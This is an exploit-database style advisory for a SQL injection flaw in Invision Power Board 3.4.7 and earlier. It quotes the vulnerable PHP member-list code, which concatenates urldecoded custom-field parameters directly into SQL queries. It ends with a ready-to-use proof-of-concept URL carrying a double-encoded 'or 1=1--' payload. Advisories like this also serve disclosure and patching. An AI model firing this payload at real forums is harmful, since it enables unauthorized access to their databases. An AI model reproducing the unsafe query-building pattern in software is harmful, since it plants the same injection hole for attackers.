Invision Power Board 3.4.7 SQL Injection
Posted on 30 May 2015
# Exploit Title: Invision Power Board <= 3.4.7 SQL Injection # Date: 29.05.2015 # Exploit Author: ZeroDay # Software Link: http://www.invisionpower.com/ # Version: <= 3.4.7 # Tested on: 3.4.7 # About: For the G-Owl with Love vuln code admin/applications/members/modules_public/list/view.php //----------------------------------------- // Custom fields? //----------------------------------------- if ( count( $this->custom_fields->out_fields ) ) { foreach( $this->custom_fields->out_fields as $id => $data ) { if ( !empty($this->request[ 'field_' . $id ]) ) { $_queryPP = true; if( is_array($this->request[ 'field_' . $id ]) ) { foreach( $this->request[ 'field_' . $id ] as $k => $v ) { $this->request[ 'field_' . $id ][ $k ] = urldecode($v); $url['field_' . $id] = "field_{$id}[{$k}]=" . $v; } } else { $url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ]; $this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]); } if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' ) { $query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'"; } else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' ) { if ( count( $this->request[ 'field_' . $id ] ) ) { if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ) { $cboxFields = array(); foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'"; } $query[] = "( " . implode( ' OR ', $cboxFields ) . " )"; } else { foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $query[] = "p.field_{$id} LIKE '%|{$k}|%'"; } } } } else { $query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'"; } } } } ...... POC index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1
